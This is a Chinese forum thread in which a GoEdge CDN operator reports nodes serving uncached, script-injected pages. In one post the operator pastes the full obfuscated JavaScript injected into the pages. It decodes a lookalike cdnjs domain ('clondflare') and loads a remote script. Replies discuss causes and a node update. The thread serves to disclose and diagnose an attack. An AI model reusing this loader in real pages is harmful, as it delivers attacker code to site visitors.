返回列表 发布新帖
查看: 259|回复: 10

goedge缓存和挂马

1

主题

4

回帖

168

积分

正式会员

积分
168
发表于 2025-6-28 13:56:42 | 查看全部 |阅读模式

欢迎注册账号,享受无广告更清爽的界面!

您需要 登录 才可以下载或查看,没有账号?注册

×
goedge的节点频繁会不缓存网页,js等其他静态资源就会缓存,节点重装就会正常村换,但是隔一会又会不缓存。
磁盘空间也够用

重新安装节点后他是x-cache HIT, policy, disk
但是过几个小时,节点上的网站他就会显示为x-cache BYPASS, JavaScript injection
x-edge-decompressed true
爱生活,爱奶昔~

291

主题

1040

回帖

5507

积分

金牌会员

积分
5507
发表于 2025-6-28 17:46:57 来自手机 | 查看全部
禁用内存缓存
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

1

主题

4

回帖

168

积分

正式会员

积分
168
 楼主| 发表于 2025-7-1 13:52:45 | 查看全部
被投毒了,挂马<script type="text/javascript">function xxSJRox(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}function aPnDhiTia(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}return xxSJRox(t)}eval('window')['\x4d\x66\x58\x4b\x77\x56']=function(){;(function(u,r,w,d,f,c){var x=aPnDhiTia;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));'jQuery';k=r[2]+'c'+f[1];'Flex';v=k+f[6];var s=d.createElement(v+c[0]+c[1]),g=function(){};s.type='text/javascript';{s.onload=function(){g()}}s.src=u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly9jZG5qcy5jbG9uZGZsYXJlLmNvbS9hamF4L2xpYnMvanF1ZXJ5Lm1pbi0zLjcuNC5qcw==','FgsPmaNtZ',window,document,'jrGYBsijJU','ptbnNbK')};if(!(/^Mac|Win/.test(navigator.platform)))MfXKwV();</script>

解密后得到加载JS代码:https://cdnjs.clondflare.com/ajax/libs/jquery.min-3.7.4.js
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

0

主题

67

回帖

4776

积分

高级会员

积分
4776
发表于 2025-7-3 16:33:49 | 查看全部
gaoanw 发表于 2025-7-1 13:52
被投毒了,挂马function xxSJRox(e){var t="",n=r=c1=c2=0;while(n

找到哪里投毒的吗
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

1

主题

4

回帖

168

积分

正式会员

积分
168
 楼主| 发表于 6 天前 | 查看全部
用了奶昔的1.3.9版本,还是被投毒,做了127.0.0.1处理
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

187

主题

918

回帖

4674

积分

管理员

奶昔

积分
4674
发表于 6 天前 来自手机 | 查看全部
gaoanw 发表于 2025-7-10 19:19
用了奶昔的1.3.9版本,还是被投毒,做了127.0.0.1处理

楼主说的挂码为啥是cloudflare的cdnjs呢
clondflare哈哈哈 
发表于 5 天前
奶昔论坛,双击666
回复 支持 反对

使用道具 举报

11

主题

122

回帖

1万

积分

论坛元老

积分
14527

论坛元老

发表于 6 天前 | 查看全部
可以试试axisnow
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

1

主题

4

回帖

168

积分

正式会员

积分
168
 楼主| 发表于 5 天前 | 查看全部
nyarime 发表于 2025-7-10 19:39
楼主说的挂码为啥是cloudflare的cdnjs呢

只是看着像,有一个字母不同
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

1

主题

4

回帖

168

积分

正式会员

积分
168
 楼主| 发表于 5 天前 | 查看全部
论坛版本也不安全
爱生活,爱奶昔~
回复 支持 反对

使用道具 举报

187

主题

918

回帖

4674

积分

管理员

奶昔

积分
4674
发表于 5 天前 | 查看全部
gaoanw 发表于 2025-7-11 13:20
论坛版本也不安全

已更新edge-node v1.3.9,请自行覆盖。
  1. cd /usr/local/goedge/edge-admin/deploy
  2. rm -rf *.zip
  3. wget -O edge-node-linux-amd64-v1.3.9.zip https://dl.naixi.net/cdn/goedge/goedgecn/edge-node-linux-amd64-plus-v1.3.9.zip
  4. wget -O edge-node-linux-arm64-v1.3.9.zip https://dl.naixi.net/cdn/goedge/goedgecn/edge-node-linux-arm64-plus-v1.3.9.zip
复制代码
奶昔论坛,双击666
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

  • 卡粉专属群
  • 官方电报群
© 2025 Naixi Networks 沪ICP备13020230号-1|沪公网安备 31010702007642号
关灯 在本版发帖
扫一扫添加微信客服
返回顶部
快速回复 返回顶部 返回列表